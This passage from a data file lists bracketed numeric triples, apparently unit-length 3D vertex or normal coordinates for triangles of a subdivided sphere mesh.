[-0.506734728813,0.217834427953,0.834127128124],
[-0.529480218887,0.153434738517,0.834331154823],
[-0.588087081909,0.131048902869,0.798110127449],
[-0.627150595188,0.171839639544,0.759706020355],
[-0.643326640129,0.108097285032,0.757922053337],
[-0.529480218887,0.153434738517,0.834331154823],
[-0.588087081909,0.131048902869,0.798110127449],
[-0.548688352108,0.091976031661,0.830952167511],
[-0.413926929235,0.3044308424,0.857896447182],
[-0.450116455555,0.352179646492,0.820587992668],
[-0.480284929276,0.284414708614,0.829719662666],
[-0.346611320972,0.436200261116,0.830415487289],
[-0.379529476166,0.486395716667,0.787004828453],
[-0.416404157877,0.419940322638,0.806385576725],
[-0.485873311758,0.400663375854,0.776785671711],
[-0.520354926586,0.44894811511,0.726413309574],
[-0.553625464439,0.378517180681,0.74177056551],
[-0.416404157877,0.419940322638,0.806385576725],
[-0.485873311758,0.400663375854,0.776785671711],
[-0.450116455555,0.352179646492,0.820587992668],
[-0.665048420429,0.213841319084,0.715529501438],
[-0.700865805149,0.256401896477,0.665616393089],
[-0.718357801437,0.188148602843,0.669747889042],
[-0.618283927441,0.353819847107,0.701809465885],
[-0.65135627985,0.398910075426,0.645450055599],
[-0.678621411324,0.327040165663,0.657660841942],
[-0.733673810959,0.298754066229,0.610302150249],
[-0.762617051601,0.340069264174,0.550243675709],
[-0.782811582088,0.269586592913,0.560828924179],
[-0.678621411324,0.327040165663,0.657660841942],
[-0.733673810959,0.298754066229,0.610302150249],
[-0.700865805149,0.256401896477,0.665616393089],
[-0.480284929276,0.284414708614,0.829719662666],
[-0.545040607452,0.26241543889,0.796284377575],
[-0.506734728813,0.217834427953,0.834127128124],
[-0.553625464439,0.378517180681,0.74177056551],
[-0.618283927441,0.353819847107,0.701809465885],
[-0.582528710365,0.308011889458,0.752189457417],
[-0.606988489628,0.238753452897,0.757998526096],
[-0.665048420429,0.213841319084,0.715529501438],
[-0.627150595188,0.171839639544,0.759706020355],
[-0.582528710365,0.308011889458,0.752189457417],
[-0.606988489628,0.238753452897,0.757998526096],
[-0.545040607452,0.26241543889,0.796284377575],
[-0.269586592913,0.560828924179,0.782811582088],
[-0.298754066229,0.610302150249,0.733673810959],
[-0.340069264174,0.550243675709,0.762617051601],
[-0.188148602843,0.669747889042,0.718357801437],
[-0.213841319084,0.715529501438,0.665048420429],
[-0.256401896477,0.665616393089,0.700865805149],
[-0.327040165663,0.657660841942,0.678621411324],
[-0.353819847107,0.701809465885,0.618283927441],
[-0.398910075426,0.645450055599,0.65135627985],
[-0.256401896477,0.665616393089,0.700865805149],
[-0.327040165663,0.657660841942,0.678621411324],
[-0.298754066229,0.610302150249,0.733673810959],
[-0.108097285032,0.757922053337,0.643326640129],
[-0.131048902869,0.798110127449,0.588087081909],
[-0.171839639544,0.759706020355,0.627150595188],
[-0.0339771322906,0.82464236021,0.564633131027],
[-0.0549761541188,0.858619451523,0.509656965733],
[-0.091976031661,0.830952167511,0.548688352108],
[-0.153434738517,0.834331154823,0.529480218887],
[-0.174905076623,0.866019308567,0.468421578407],
[-0.217834427953,0.834127128124,0.506734728813],
[-0.091976031661,0.830952167511,0.548688352108],
[-0.153434738517,0.834331154823,0.529480218887],
[-0.131048902869,0.798110127449,0.588087081909],
[-0.378517180681,0.74177056551,0.553625464439],
[-0.400663375854,0.776785671711,0.485873311758],
[-0.44894811511,0.726413309574,0.520354926586],
[-0.284414708614,0.829719662666,0.480284929276],
[-0.3044308424,0.857896447182,0.413926929235],
[-0.352179646492,0.820587992668,0.450116455555],
[-0.419940322638,0.806385576725,0.416404157877],
[-0.436200261116,0.830415487289,0.346611320972],
[-0.486395716667,0.787004828453,0.379529476166],
[-0.352179646492,0.820587992668,0.450116455555],
[-0.419940322638,0.806385576725,0.416404157877],
[-0.400663375854,0.776785671711,0.485873311758],
[-0.171839639544,0.759706020355,0.627150595188],
[-0.238753452897,0.757998526096,0.606988489628],
[-0.213841319084,0.715529501438,0.665048420429],
[-0.217834427953,0.834127128124,0.506734728813],
[-0.284414708614,0.829719662666,0.480284929276],
[-0.26241543889,0.796284377575,0.545040607452],
[-0.308011889458,0.752189457417,0.582528710365],
[-0.378517180681,0.74177056551,0.553625464439],
[-0.353819847107,0.701809465885,0.618283927441],
[-0.26241543889,0.796284377575,0.545040607452],
[-0.308011889458,0.752189457417,0.582528710365],
[-0.238753452897,0.757998526096,0.606988489628],
[-0.787004828453,0.379529476166,0.486395716667],
[-0.806385576725,0.416404157877,0.419940322638],
[-0.830415487289,0.346611320972,0.436200261116],
[-0.726413309574,0.520354926586,0.44894811511],
[-0.74177056551,0.553625464439,0.378517180681],
[-0.776785671711,0.485873311758,0.400663375854],
[-0.820587992668,0.450116455555,0.352179646492],
[-0.829719662666,0.480284929276,0.284414708614],
[-0.857896447182,0.413926929235,0.3044308424],
[-0.776785671711,0.485873311758,0.400663375854],
[-0.820587992668,0.450116455555,0.352179646492],
[-0.806385576725,0.416404157877,0.419940322638],
[-0.645450055599,0.65135627985,0.398910075426],
[-0.657660841942,0.678621411324,0.327040165663],
[-0.701809465885,0.618283927441,0.353819847107],
[-0.550243675709,0.762617051601,0.340069264174],
[-0.560828924179,0.782811582088,0.269586592913],
[-0.610302150249,0.733673810959,0.298754066229],
[-0.665616393089,0.700865805149,0.256401896477],
[-0.669747889042,0.718357801437,0.188148602843],
[-0.715529501438,0.665048420429,0.213841319084],
[-0.610302150249,0.733673810959,0.298754066229],
[-0.665616393089,0.700865805149,0.256401896477],
[-0.657660841942,0.678621411324,0.327040165663],
[-0.834127128124,0.506734728813,0.217834427953],
[-0.834331154823,0.529480218887,0.153434738517],
[-0.866019308567,0.468421578407,0.174905076623],
[-0.759706020355,0.627150595188,0.171839639544],
[-0.757922053337,0.643326640129,0.108097285032],
[-0.798110127449,0.588087081909,0.131048902869],
[-0.830952167511,0.548688352108,0.091976031661],
[-0.82464236021,0.564633131027,0.0339771322906],
[-0.858619451523,0.509656965733,0.0549761541188],
[-0.798110127449,0.588087081909,0.131048902869],
[-0.830952167511,0.548688352108,0.091976031661],
[-0.834331154823,0.529480218887,0.153434738517],
[-0.701809465885,0.618283927441,0.353819847107],
[-0.752189457417,0.582528710365,0.308011889458],
[-0.74177056551,0.553625464439,0.378517180681],
[-0.715529501438,0.665048420429,0.213841319084],
[-0.759706020355,0.627150595188,0.171839639544],
[-0.757998526096,0.606988489628,0.238753452897],
[-0.796284377575,0.545040607452,0.26241543889],
[-0.834127128124,0.506734728813,0.217834427953],
[-0.829719662666,0.480284929276,0.284414708614],
[-0.757998526096,0.606988489628,0.238753452897],
[-0.796284377575,0.545040607452,0.26241543889],
[-0.752189457417,0.582528710365,0.308011889458],
[-0.340069264174,0.550243675709,0.762617051601],
[-0.411682873964,0.535965919495,0.737060189247],
[-0.379529476166,0.486395716667,0.787004828453],
[-0.398910075426,0.645450055599,0.65135627985],
[-0.470621615648,0.628728508949,0.619044244289],
[-0.44230055809,0.58378881216,0.680853009224],
[-0.483050197363,0.517854511738,0.706037700176],
[-0.552667617798,0.495975226164,0.669751524925],
[-0.520354926586,0.44894811511,0.726413309574],
[-0.44230055809,0.58378881216,0.680853009224],
[-0.483050197363,0.517854511738,0.706037700176],
[-0.411682873964,0.535965919495,0.737060189247],
[-0.44894811511,0.726413309574,0.520354926586],
[-0.517854511738,0.706037700176,0.483050197363],
[-0.495975226164,0.669751524925,0.552667617798],
[-0.486395716667,0.787004828453,0.379529476166],
[-0.550243675709,0.762617051601,0.340069264174],
[-0.535965919495,0.737060189247,0.411682873964],
[-0.58378881216,0.680853009224,0.44230055809],
[-0.645450055599,0.65135627985,0.398910075426],
[-0.628728508949,0.619044244289,0.470621615648],
[-0.535965919495,0.737060189247,0.411682873964],
[-0.58378881216,0.680853009224,0.44230055809],
[-0.517854511738,0.706037700176,0.483050197363],
[-0.619044244289,0.470621615648,0.628728508949],
[-0.680853009224,0.44230055809,0.58378881216],
[-0.65135627985,0.398910075426,0.645450055599],
[-0.669751524925,0.552667617798,0.495975226164],
[-0.726413309574,0.520354926586,0.44894811511],
[-0.706037700176,0.483050197363,0.517854511738],
[-0.737060189247,0.411682873964,0.535965919495],
[-0.787004828453,0.379529476166,0.486395716667],
[-0.762617051601,0.340069264174,0.550243675709],
[-0.706037700176,0.483050197363,0.517854511738],
[-0.737060189247,0.411682873964,0.535965919495],
[-0.680853009224,0.44230055809,0.58378881216],
[-0.495975226164,0.669751524925,0.552667617798],
[-0.540649950504,0.607478022575,0.581951975822],
[-0.470621615648,0.628728508949,0.619044244289],
[-0.628728508949,0.619044244289,0.470621615648],
[-0.669751524925,0.552667617798,0.495975226164],
[-0.607478022575,0.581951975822,0.540649950504],
[-0.581951975822,0.540649950504,0.607478022575],
[-0.619044244289,0.470621615648,0.628728508949],
[-0.552667617798,0.495975226164,0.669751524925],
[-0.607478022575,0.581951975822,0.540649950504],
[-0.581951975822,0.540649950504,0.607478022575],
[-0.540649950504,0.607478022575,0.581951975822],
[-0.0339771322906,0.82464236021,0.564633131027],
[0.0,0.79582041502,0.605532705784],
[0.0339771322906,0.82464236021,0.564633131027],
[-0.108097285032,0.757922053337,0.643326640129],
[-0.0744211226702,0.722495436668,0.687358558178],
[-0.0362210273743,0.761889100075,0.646693944931],
[0.0362210273743,0.761889100075,0.646693944931],
[0.0744211226702,0.722495436668,0.687358558178],
[0.108097285032,0.757922053337,0.643326640129],
[-0.0362210273743,0.761889100075,0.646693944931],
[0.0362210273743,0.761889100075,0.646693944931],
[0.0,0.79582041502,0.605532705784],
[-0.188148602843,0.669747889042,0.718357801437],
[-0.154971644282,0.62687343359,0.763553202152],
[-0.114190116525,0.677466154099,0.726636230946],
[-0.269586592913,0.560828924179,0.782811582088],
[-0.236761152744,0.510783493519,0.826465010643],
[-0.196083456278,0.571085453033,0.797127783298],
[-0.119124859571,0.578244268894,0.807120084763],
[-0.0809632539749,0.524005174637,0.847858190536],
[-0.0399611219764,0.581926107407,0.81225925684],
[-0.196083456278,0.571085453033,0.797127783298],
[-0.119124859571,0.578244268894,0.807120084763],
[-0.154971644282,0.62687343359,0.763553202152],
[0.114190116525,0.677466154099,0.726636230946],
[0.154971644282,0.62687343359,0.763553202152],
[0.188148602843,0.669747889042,0.718357801437],
[0.0399611219764,0.581926107407,0.81225925684],
[0.0809632539749,0.524005174637,0.847858190536],
[0.119124859571,0.578244268894,0.807120084763],
[0.196083456278,0.571085453033,0.797127783298],
[0.236761152744,0.510783493519,0.826465010643],
[0.269586592913,0.560828924179,0.782811582088],
[0.119124859571,0.578244268894,0.807120084763],
[0.196083456278,0.571085453033,0.797127783298],
[0.154971644282,0.62687343359,0.763553202152],
[-0.114190116525,0.677466154099,0.726636230946],
[-0.0382858961821,0.68142670393,0.730884253979],
[-0.0744211226702,0.722495436668,0.687358558178],
[-0.0399611219764,0.581926107407,0.81225925684],
[0.0399611219764,0.581926107407,0.81225925684],
[0.0,0.634539365768,0.772890508175],
[0.0382858961821,0.68142670393,0.730884253979],
[0.114190116525,0.677466154099,0.726636230946],
[0.0744211226702,0.722495436668,0.687358558178],
[0.0,0.634539365768,0.772890508175],
[0.0382858961821,0.68142670393,0.730884253979],
[-0.0382858961821,0.68142670393,0.730884253979],
[-0.346611320972,0.436200261116,0.830415487289],
[-0.313733518124,0.380723625422,0.869839549065],
[-0.276221334934,0.446935534477,0.85085272789],
[-0.413926929235,0.3044308424,0.857896447182],
[-0.380633711815,0.246351331472,0.891307473183],
[-0.348686188459,0.313436716795,0.883275330067],
[-0.277958005667,0.321246802807,0.905284404755],
[-0.239766731858,0.258633822203,0.935745954514],
[-0.202408134937,0.327503234148,0.922915279865],
[-0.348686188459,0.313436716795,0.883275330067],
[-0.277958005667,0.321246802807,0.905284404755],
[-0.313733518124,0.380723625422,0.869839549065],
[-0.468421578407,0.174905076623,0.866019308567],
[-0.434652328491,0.117213711143,0.892938017845],
[-0.409316182137,0.180623859167,0.894335091114],
[-0.509656965733,0.0549761541188,0.858619451523],
[-0.475679844618,0.0,0.8796184659],
[-0.456712335348,0.0568443164229,0.887796461582],
[-0.398431301117,0.0586068555713,0.915323853493],
[-0.360324263573,0.0,0.932827115059],
[-0.334895044565,0.0602079555392,0.940329909325],
[-0.456712335348,0.0568443164229,0.887796461582],
[-0.398431301117,0.0586068555713,0.915323853493],
[-0.434652328491,0.117213711143,0.892938017845],
[-0.199805602431,0.193975359201,0.960443258286],
[-0.158833146095,0.128498718143,0.978907585144],
[-0.121444880962,0.196501940489,0.97295331955],
[-0.266443610191,0.0615878328681,0.961880862713],
[-0.225778326392,0.0,0.974178731441],
[-0.193714544177,0.0626873448491,0.979053080082],
[-0.117650069296,0.0634539350867,0.991025745869],
[-0.0770247355103,0.0,0.997029185295],
[-0.0394601933658,0.0638479366899,0.997179210186],
[-0.193714544177,0.0626873448491,0.979053080082],
[-0.117650069296,0.0634539350867,0.991025745869],
[-0.158833146095,0.128498718143,0.978907585144],
[-0.409316182137,0.180623859167,0.894335091114],
[-0.34457308054,0.185843646526,0.920180141926],
[-0.380633711815,0.246351331472,0.891307473183],
[-0.334895044565,0.0602079555392,0.940329909325],
[-0.266443610191,0.0615878328681,0.961880862713],
[-0.306287169456,0.123895764351,0.943842172623],
[-0.274516820908,0.190361812711,0.942551255226],
[-0.199805602431,0.193975359201,0.960443258286],
[-0.239766731858,0.258633822203,0.935745954514],
[-0.306287169456,0.123895764351,0.943842172623],
[-0.274516820908,0.190361812711,0.942551255226],
[-0.34457308054,0.185843646526,0.920180141926],
[0.276221334934,0.446935534477,0.85085272789],
[0.313733518124,0.380723625422,0.869839549065],
[0.346611320972,0.436200261116,0.830415487289],
[0.202408134937,0.327503234148,0.922915279865],
[0.239766731858,0.258633822203,0.935745954514],
[0.277958005667,0.321246802807,0.905284404755],
[0.348686188459,0.313436716795,0.883275330067],
[0.380633711815,0.246351331472,0.891307473183],
[0.413926929235,0.3044308424,0.857896447182],
[0.277958005667,0.321246802807,0.905284404755],
[0.348686188459,0.313436716795,0.883275330067],
[0.313733518124,0.380723625422,0.869839549065],
[0.121444880962,0.196501940489,0.97295331955],
[0.158833146095,0.128498718143,0.978907585144],
[0.199805602431,0.193975359201,0.960443258286],
[0.0394601933658,0.0638479366899,0.997179210186],
[0.0770247355103,0.0,0.997029185295],
[0.117650069296,0.0634539350867,0.991025745869],
[0.193714544177,0.0626873448491,0.979053080082],
[0.225778326392,0.0,0.974178731441],
[0.266443610191,0.0615878328681,0.961880862713],
[0.117650069296,0.0634539350867,0.991025745869],
[0.193714544177,0.0626873448491,0.979053080082],
[0.158833146095,0.128498718143,0.978907585144],
[0.409316182137,0.180623859167,0.894335091114],
[0.434652328491,0.117213711143,0.892938017845],
[0.468421578407,0.174905076623,0.866019308567],
[0.334895044565,0.0602079555392,0.940329909325],
[0.360324263573,0.0,0.932827115059],
[0.398431301117,0.0586068555713,0.915323853493],
[0.456712335348,0.0568443164229,0.887796461582],
[0.475679844618,0.0,0.8796184659],
[0.509656965733,0.0549761541188,0.858619451523],
[0.398431301117,0.0586068555713,0.915323853493],
[0.456712335348,0.0568443164229,0.887796461582],
[0.434652328491,0.117213711143,0.892938017845],
[0.199805602431,0.193975359201,0.960443258286],
[0.274516820908,0.190361812711,0.942551255226],
[0.239766731858,0.258633822203,0.935745954514],
[0.266443610191,0.0615878328681,0.961880862713],
[0.334895044565,0.0602079555392,0.940329909325],
[0.306287169456,0.123895764351,0.943842172623],
[0.34457308054,0.185843646526,0.920180141926],
[0.409316182137,0.180623859167,0.894335091114],
[0.380633711815,0.246351331472,0.891307473183],
[0.306287169456,0.123895764351,0.943842172623],
[0.34457308054,0.185843646526,0.920180141926],
[0.274516820908,0.190361812711,0.942551255226],
[-0.276221334934,0.446935534477,0.85085272789],
[-0.20109423995,0.455528259277,0.867211103439],
[-0.236761152744,0.510783493519,0.826465010643],
[-0.202408134937,0.327503234148,0.922915279865],
[-0.123069040477,0.33188316226,0.935258030891],
[-0.162998497486,0.395605653524,0.903840482235],
[-0.122248865664,0.461539924145,0.878655850887],
[-0.0410230122507,0.464636415243,0.88455080986],
[-0.0809632539749,0.524005174637,0.847858190536],
[-0.162998497486,0.395605653524,0.903840482235],
[-0.122248865664,0.461539924145,0.878655850887],
[-0.20109423995,0.455528259277,0.867211103439],
[-0.121444880962,0.196501940489,0.97295331955],
[-0.0407496243715,0.197802826762,0.979394435883],
[-0.0820460245013,0.265506535769,0.960611641407],
[-0.0394601933658,0.0638479366899,0.997179210186],
[0.0394601933658,0.0638479366899,0.997179210186],
[0.0,0.130150929093,0.991494178772],
[0.0407496243715,0.197802826762,0.979394435883],
[0.121444880962,0.196501940489,0.97295331955],
[0.0820460245013,0.265506535769,0.960611641407],
[0.0,0.130150929093,0.991494178772],
[0.0407496243715,0.197802826762,0.979394435883],
[-0.0407496243715,0.197802826762,0.979394435883],
[0.0410230122507,0.464636415243,0.88455080986],
[0.122248865664,0.461539924145,0.878655850887],
[0.0809632539749,0.524005174637,0.847858190536],
[0.123069040477,0.33188316226,0.935258030891],
[0.202408134937,0.327503234148,0.922915279865],
[0.162998497486,0.395605653524,0.903840482235],
[0.20109423995,0.455528259277,0.867211103439],
[0.276221334934,0.446935534477,0.85085272789],
[0.236761152744,0.510783493519,0.826465010643],
[0.162998497486,0.395605653524,0.903840482235],
[0.20109423995,0.455528259277,0.867211103439],
[0.122248865664,0.461539924145,0.878655850887],
[-0.0820460245013,0.265506535769,0.960611641407],
[-0.04130198434,0.334140062332,0.941618084908],
[-0.123069040477,0.33188316226,0.935258030891],
[0.0820460245013,0.265506535769,0.960611641407],
[0.123069040477,0.33188316226,0.935258030891],
[0.04130198434,0.334140062332,0.941618084908],
[0.0,0.400968074799,0.916092038155],
[0.0410230122507,0.464636415243,0.88455080986],
[-0.0410230122507,0.464636415243,0.88455080986],
[0.04130198434,0.334140062332,0.941618084908],
[0.0,0.400968074799,0.916092038155],
[-0.04130198434,0.334140062332,0.941618084908],
[-0.0549761541188,0.858619451523,-0.509656965733],
[-0.0568443164229,0.887796461582,-0.456712335348],
[0.0,0.8796184659,-0.475679844618],
[-0.174905076623,0.866019308567,-0.468421578407],
[-0.180623859167,0.894335091114,-0.409316182137],
[-0.117213711143,0.892938017845,-0.434652328491],
[-0.0586068555713,0.915323853493,-0.398431301117],
[-0.0602079555392,0.940329909325,-0.334895044565],
[0.0,0.932827115059,-0.360324263573],
[-0.117213711143,0.892938017845,-0.434652328491],
[-0.0586068555713,0.915323853493,-0.398431301117],
[-0.0568443164229,0.887796461582,-0.456712335348],
[-0.3044308424,0.857896447182,-0.413926929235],
[-0.313436716795,0.883275330067,-0.348686188459],
[-0.246351331472,0.891307473183,-0.380633711815],
[-0.436200261116,0.830415487289,-0.346611320972],
[-0.446935534477,0.85085272789,-0.276221334934],
[-0.380723625422,0.869839549065,-0.313733518124],
[-0.321246802807,0.905284404755,-0.277958005667],
[-0.327503234148,0.922915279865,-0.202408134937],
[-0.258633822203,0.935745954514,-0.239766731858],
[-0.380723625422,0.869839549065,-0.313733518124],
[-0.321246802807,0.905284404755,-0.277958005667],
[-0.313436716795,0.883275330067,-0.348686188459],
[-0.0615878328681,0.961880862713,-0.266443610191],
[-0.0626873448491,0.979053080082,-0.193714544177],
[0.0,0.974178731441,-0.225778326392],
[-0.193975359201,0.960443258286,-0.199805602431],
[-0.196501940489,0.97295331955,-0.121444880962],
[-0.128498718143,0.978907585144,-0.158833146095],
[-0.0634539350867,0.991025745869,-0.117650069296],
[-0.0638479366899,0.997179210186,-0.0394601933658],
[0.0,0.997029185295,-0.0770247355103],
[-0.128498718143,0.978907585144,-0.158833146095],
[-0.0634539350867,0.991025745869,-0.117650069296],
[-0.0626873448491,0.979053080082,-0.193714544177],
[-0.246351331472,0.891307473183,-0.380633711815],
[-0.185843646526,0.920180141926,-0.34457308054],
[-0.180623859167,0.894335091114,-0.409316182137],
[-0.258633822203,0.935745954514,-0.239766731858],
[-0.193975359201,0.960443258286,-0.199805602431],
[-0.190361812711,0.942551255226,-0.274516820908],
[-0.123895764351,0.943842172623,-0.306287169456],
[-0.0615878328681,0.961880862713,-0.266443610191],
[-0.0602079555392,0.940329909325,-0.334895044565],
[-0.190361812711,0.942551255226,-0.274516820908],
[-0.123895764351,0.943842172623,-0.306287169456],
[-0.185843646526,0.920180141926,-0.34457308054],
[-0.560828924179,0.782811582088,-0.269586592913],
[-0.571085453033,0.797127783298,-0.196083456278],
[-0.510783493519,0.826465010643,-0.236761152744],
[-0.669747889042,0.718357801437,-0.188148602843],
[-0.677466154099,0.726636230946,-0.114190116525],
[-0.62687343359,0.763553202152,-0.154971644282],
[-0.578244268894,0.807120084763,-0.119124859571],
[-0.581926107407,0.81225925684,-0.0399611219764],
[-0.524005174637,0.847858190536,-0.0809632539749],
[-0.62687343359,0.763553202152,-0.154971644282],
[-0.578244268894,0.807120084763,-0.119124859571],
[-0.571085453033,0.797127783298,-0.196083456278],
[-0.757922053337,0.643326640129,-0.108097285032],
[-0.761889100075,0.646693944931,-0.0362210273743],
[-0.722495436668,0.687358558178,-0.0744211226702],
[-0.82464236021,0.564633131027,-0.0339771322906],
[-0.82464236021,0.564633131027,0.0339771322906],
[-0.79582041502,0.605532705784,0.0],
[-0.761889100075,0.646693944931,0.0362210273743],
[-0.757922053337,0.643326640129,0.108097285032],
[-0.722495436668,0.687358558178,0.0744211226702],
[-0.79582041502,0.605532705784,0.0],
[-0.761889100075,0.646693944931,0.0362210273743],
[-0.761889100075,0.646693944931,-0.0362210273743],
[-0.581926107407,0.81225925684,0.0399611219764],
[-0.578244268894,0.807120084763,0.119124859571],
[-0.524005174637,0.847858190536,0.0809632539749],
[-0.677466154099,0.726636230946,0.114190116525],
[-0.669747889042,0.718357801437,0.188148602843],
[-0.62687343359,0.763553202152,0.154971644282],
[-0.571085453033,0.797127783298,0.196083456278],
[-0.560828924179,0.782811582088,0.269586592913],
[-0.510783493519,0.826465010643,0.236761152744],
[-0.62687343359,0.763553202152,0.154971644282],
[-0.571085453033,0.797127783298,0.196083456278],
[-0.578244268894,0.807120084763,0.119124859571],
[-0.722495436668,0.687358558178,-0.0744211226702],
[-0.68142670393,0.730884253979,-0.0382858961821],
[-0.677466154099,0.726636230946,-0.114190116525],
[-0.722495436668,0.687358558178,0.0744211226702],
[-0.677466154099,0.726636230946,0.114190116525],
[-0.68142670393,0.730884253979,0.0382858961821],
[-0.634539365768,0.772890508175,0.0],
[-0.581926107407,0.81225925684,0.0399611219764],
[-0.581926107407,0.81225925684,-0.0399611219764],
[-0.68142670393,0.730884253979,0.0382858961821],
[-0.634539365768,0.772890508175,0.0],
[-0.68142670393,0.730884253979,-0.0382858961821],
[-0.0638479366899,0.997179210186,0.0394601933658],
[-0.0634539350867,0.991025745869,0.117650069296],
[0.0,0.997029185295,0.0770247355103],
[-0.196501940489,0.97295331955,0.121444880962],
[-0.193975359201,0.960443258286,0.199805602431],
[-0.128498718143,0.978907585144,0.158833146095],
[-0.0626873448491,0.979053080082,0.193714544177],
[-0.0615878328681,0.961880862713,0.266443610191],
[0.0,0.974178731441,0.225778326392],
[-0.128498718143,0.978907585144,0.158833146095],
[-0.0626873448491,0.979053080082,0.193714544177],
[-0.0634539350867,0.991025745869,0.117650069296],
[-0.327503234148,0.922915279865,0.202408134937],
[-0.321246802807,0.905284404755,0.277958005667],
[-0.258633822203,0.935745954514,0.239766731858],
[-0.446935534477,0.85085272789,0.276221334934],
[-0.436200261116,0.830415487289,0.346611320972],
[-0.380723625422,0.869839549065,0.313733518124],
[-0.313436716795,0.883275330067,0.348686188459],
[-0.3044308424,0.857896447182,0.413926929235],
[-0.246351331472,0.891307473183,0.380633711815],
[-0.380723625422,0.869839549065,0.313733518124],
[-0.313436716795,0.883275330067,0.348686188459],
[-0.321246802807,0.905284404755,0.277958005667],
[-0.0602079555392,0.940329909325,0.334895044565],
[-0.0586068555713,0.915323853493,0.398431301117],
[0.0,0.932827115059,0.360324263573],
[-0.180623859167,0.894335091114,0.409316182137],
[-0.174905076623,0.866019308567,0.468421578407],
[-0.117213711143,0.892938017845,0.434652328491],
[-0.0568443164229,0.887796461582,0.456712335348],
[-0.0549761541188,0.858619451523,0.509656965733],
[0.0,0.8796184659,0.475679844618],
[-0.117213711143,0.892938017845,0.434652328491],
[-0.0568443164229,0.887796461582,0.456712335348],
[-0.0586068555713,0.915323853493,0.398431301117],
[-0.258633822203,0.935745954514,0.239766731858],
[-0.190361812711,0.942551255226,0.274516820908],
[-0.193975359201,0.960443258286,0.199805602431],
[-0.246351331472,0.891307473183,0.380633711815],
[-0.180623859167,0.894335091114,0.409316182137],
[-0.185843646526,0.920180141926,0.34457308054],
[-0.123895764351,0.943842172623,0.306287169456],
[-0.0602079555392,0.940329909325,0.334895044565],
[-0.0615878328681,0.961880862713,0.266443610191],
[-0.185843646526,0.920180141926,0.34457308054],
[-0.123895764351,0.943842172623,0.306287169456],
[-0.190361812711,0.942551255226,0.274516820908],
[-0.510783493519,0.826465010643,-0.236761152744],
[-0.455528259277,0.867211103439,-0.20109423995],
[-0.446935534477,0.85085272789,-0.276221334934],
[-0.524005174637,0.847858190536,-0.0809632539749],
[-0.464636415243,0.88455080986,-0.0410230122507],
[-0.461539924145,0.878655850887,-0.122248865664],
[-0.395605653524,0.903840482235,-0.162998497486],
[-0.33188316226,0.935258030891,-0.123069040477],
[-0.327503234148,0.922915279865,-0.202408134937],
[-0.461539924145,0.878655850887,-0.122248865664],
[-0.395605653524,0.903840482235,-0.162998497486],
[-0.455528259277,0.867211103439,-0.20109423995],
[-0.524005174637,0.847858190536,0.0809632539749],
[-0.461539924145,0.878655850887,0.122248865664],
[-0.464636415243,0.88455080986,0.0410230122507],
[-0.510783493519,0.826465010643,0.236761152744],
[-0.446935534477,0.85085272789,0.276221334934],
[-0.455528259277,0.867211103439,0.20109423995],
[-0.395605653524,0.903840482235,0.162998497486],
[-0.327503234148,0.922915279865,0.202408134937],
[-0.33188316226,0.935258030891,0.123069040477],
[-0.455528259277,0.867211103439,0.20109423995],
[-0.395605653524,0.903840482235,0.162998497486],
[-0.461539924145,0.878655850887,0.122248865664],
[-0.265506535769,0.960611641407,-0.0820460245013],
[-0.197802826762,0.979394435883,-0.0407496243715],
[-0.196501940489,0.97295331955,-0.121444880962],
[-0.265506535769,0.960611641407,0.0820460245013],
[-0.196501940489,0.97295331955,0.121444880962],
[-0.197802826762,0.979394435883,0.0407496243715],
[-0.130150929093,0.991494178772,0.0],
[-0.0638479366899,0.997179210186,0.0394601933658],
[-0.0638479366899,0.997179210186,-0.0394601933658],
[-0.197802826762,0.979394435883,0.0407496243715],
[-0.130150929093,0.991494178772,0.0],
[-0.197802826762,0.979394435883,-0.0407496243715],
[-0.464636415243,0.88455080986,0.0410230122507],
[-0.400968074799,0.916092038155,0.0],
[-0.464636415243,0.88455080986,-0.0410230122507],
[-0.33188316226,0.935258030891,0.123069040477],
[-0.265506535769,0.960611641407,0.0820460245013],
[-0.334140062332,0.941618084908,0.04130198434],
[-0.334140062332,0.941618084908,-0.04130198434],
[-0.265506535769,0.960611641407,-0.0820460245013],
[-0.33188316226,0.935258030891,-0.123069040477],
[-0.334140062332,0.941618084908,0.04130198434],
[-0.334140062332,0.941618084908,-0.04130198434],
[-0.400968074799,0.916092038155,0.0],
[0.564633131027,0.0339771322906,-0.82464236021],
[0.605532705784,0.0,-0.79582041502],
[0.564633131027,-0.0339771322906,-0.82464236021],
[0.643326640129,0.108097285032,-0.757922053337],
[0.687358558178,0.0744211226702,-0.722495436668],
[0.646693944931,0.0362210273743,-0.761889100075],
[0.646693944931,-0.0362210273743,-0.761889100075],
[0.687358558178,-0.0744211226702,-0.722495436668],
[0.643326640129,-0.108097285032,-0.757922053337],
[0.646693944931,0.0362210273743,-0.761889100075],
[0.646693944931,-0.0362210273743,-0.761889100075],
[0.605532705784,0.0,-0.79582041502],
[0.718357801437,0.188148602843,-0.669747889042],
[0.763553202152,0.154971644282,-0.62687343359],
[0.726636230946,0.114190116525,-0.677466154099],
[0.782811582088,0.269586592913,-0.560828924179],
[0.826465010643,0.236761152744,-0.510783493519],
[0.797127783298,0.196083456278,-0.571085453033],
[0.807120084763,0.119124859571,-0.578244268894],
[0.847858190536,0.0809632539749,-0.524005174637],
[0.81225925684,0.0399611219764,-0.581926107407],
[0.797127783298,0.196083456278,-0.571085453033],
[0.807120084763,0.119124859571,-0.578244268894],
[0.763553202152,0.154971644282,-0.62687343359],
[0.726636230946,-0.114190116525,-0.677466154099],
[0.763553202152,-0.154971644282,-0.62687343359],
[0.718357801437,-0.188148602843,-0.669747889042],
[0.81225925684,-0.0399611219764,-0.581926107407],
[0.847858190536,-0.0809632539749,-0.524005174637],
[0.807120084763,-0.119124859571,-0.578244268894],
[0.797127783298,-0.196083456278,-0.571085453033],
[0.826465010643,-0.236761152744,-0.510783493519],
[0.782811582088,-0.269586592913,-0.560828924179],
[0.807120084763,-0.119124859571,-0.578244268894],
[0.797127783298,-0.196083456278,-0.571085453033],
[0.763553202152,-0.154971644282,-0.62687343359],
[0.726636230946,0.114190116525,-0.677466154099],
[0.730884253979,0.0382858961821,-0.68142670393],
[0.687358558178,0.0744211226702,-0.722495436668],
[0.81225925684,0.0399611219764,-0.581926107407],
[0.81225925684,-0.0399611219764,-0.581926107407],
[0.772890508175,0.0,-0.634539365768],
[0.730884253979,-0.0382858961821,-0.68142670393],
[0.726636230946,-0.114190116525,-0.677466154099],
[0.687358558178,-0.0744211226702,-0.722495436668],
[0.772890508175,0.0,-0.634539365768],
[0.730884253979,-0.0382858961821,-0.68142670393],
[0.730884253979,0.0382858961821,-0.68142670393],
[0.830415487289,0.346611320972,-0.436200261116],
[0.869839549065,0.313733518124,-0.380723625422],
